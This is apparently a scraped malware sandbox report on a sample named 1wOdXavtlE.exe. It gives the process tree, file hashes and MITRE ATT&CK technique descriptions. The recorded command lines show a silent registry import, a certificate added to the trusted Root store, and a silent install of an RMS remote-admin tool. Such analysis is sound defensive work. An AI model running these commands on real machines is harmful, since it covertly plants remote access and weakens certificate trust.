Start time:	11:01:30
Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: ssevs.exe PID: 6444 Parent PID: 6980

General

Start time:	11:01:31
Start date:	08/04/2021
Path:	C:\Users\user\AppData\Local\Temp\ssevs.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\ssevs.exe'
Imagebase:	0xcd0000
File size:	976384 bytes
MD5 hash:	17A490DB01806E788407EC152760E5B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 22%, Metadefender, Browse Detection: 40%, ReversingLabs

Analysis Process: PasswordOnWakeSettingFlyout.exe PID: 6428 Parent PID: 6396

General

Start time:	11:01:30
Start date:	08/04/2021
Path:	C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Imagebase:	0x7ff7d9f50000
File size:	43472 bytes
MD5 hash:	F0C8675F98E397383A112CC8ED5B97DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: pass.exe PID: 5880 Parent PID: 6428

General

Start time:	11:01:33
Start date:	08/04/2021
Path:	C:\ProgramData\pass.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\pass.exe
Imagebase:	0x400000
File size:	10204226 bytes
MD5 hash:	A5E2BB848405DFC3A56FC892B691B614
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi

Analysis Process: sssevs.exe PID: 5328 Parent PID: 6980

General

Start time:	11:01:33
Start date:	08/04/2021
Path:	C:\Users\user\AppData\Local\Temp\sssevs.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\sssevs.exe'
Imagebase:	0xff0000
File size:	727664 bytes
MD5 hash:	7B640BAE01407187610BA076D5509628
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: pass.tmp PID: 5400 Parent PID: 5880

General

Start time:	11:01:36
Start date:	08/04/2021
Path:	C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp' /SL5='$10584,9506241,724480,C:\ProgramData\pass.exe'
Imagebase:	0x400000
File size:	2535424 bytes
MD5 hash:	C1B49299EB51AFA1264D69FC022BB49B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi

Analysis Process: ssevs.exe PID: 5728 Parent PID: 6444

General

Start time:	11:01:40
Start date:	08/04/2021
Path:	C:\Users\user\AppData\Local\Temp\ssevs.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x520000
File size:	976384 bytes
MD5 hash:	17A490DB01806E788407EC152760E5B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: timeout.exe PID: 1180 Parent PID: 6396

General

Start time:	11:01:41
Start date:	08/04/2021
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	TIMEOUT /T 8
Imagebase:	0x7ff784a70000
File size:	30720 bytes
MD5 hash:	EB9A65078396FB5D4E3813BB9198CB18
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 5712 Parent PID: 5400

General

Start time:	11:01:43
Start date:	08/04/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\cmd.exe' /c 'regedit /s C:\ProgramData\Immunity\ses.reg'
Imagebase:	0x7ff7180e0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4980 Parent PID: 5712

General

Start time:	11:01:44
Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: regedit.exe PID: 6912 Parent PID: 5712

General

Start time:	11:01:44
Start date:	08/04/2021
Path:	C:\Windows\regedit.exe
Wow64 process (32bit):	false
Commandline:	regedit /s C:\ProgramData\Immunity\ses.reg
Imagebase:	0x7ff6a38f0000
File size:	336384 bytes
MD5 hash:	AC91328EE5CFFBD695CE912F75F876F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: sssevs.exe PID: 4748 Parent PID: 5328

General

Start time:	11:01:45
Start date:	08/04/2021
Path:	C:\Users\user\AppData\Local\Temp\sssevs.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x560000
File size:	727664 bytes
MD5 hash:	7B640BAE01407187610BA076D5509628
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: cmd.exe PID: 5224 Parent PID: 5400

General

Start time:	11:01:47
Start date:	08/04/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\Immunity\install.cmd''
Imagebase:	0x7ff7180e0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4440 Parent PID: 5224

General

Start time:	11:01:48
Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff614b90000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: CertMgr.Exe PID: 5848 Parent PID: 5224

General

Start time:	11:01:48
Start date:	08/04/2021
Path:	C:\ProgramData\Immunity\CertMgry\CertMgr.Exe
Wow64 process (32bit):	true
Commandline:	certmgr.exe -add -c Sert.cer -s -r localMachine Root
Imagebase:	0x1000000
File size:	59152 bytes
MD5 hash:	229EE3F6A87B33F0C6E589C0EA3CC085
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rutserv.exe PID: 1684 Parent PID: 5224

General

Start time:	11:01:55
Start date:	08/04/2021
Path:	C:\ProgramData\Immunity\rutserv.exe
Wow64 process (32bit):	true
Commandline:	'rutserv.exe' /silentinstall
Imagebase:	0x400000
File size:	18549096 bytes
MD5 hash:	43B697A1A52D948FCBEAE234C3CBD21E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_RMSRemoteAdmin, Description: Yara detected RMS RemoteAdmin tool, Source: 00000025.00000002.570035288.00000000015DA000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_RMSRemoteAdmin, Description: Yara detected RMS RemoteAdmin tool, Source: 00000025.00000000.537867326.00000000015DA000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000025.00000002.549143519.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000025.00000000.508478042.0000000000401000.00000020.00020000.sdmp, Author: Joe Security

Analysis Process: svchost.exe PID: 2468 Parent PID: 560

General

Start time:	11:01:59
Start date:	08/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 1wOdXavtlE.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Dropped Files

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

DNS Queries

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre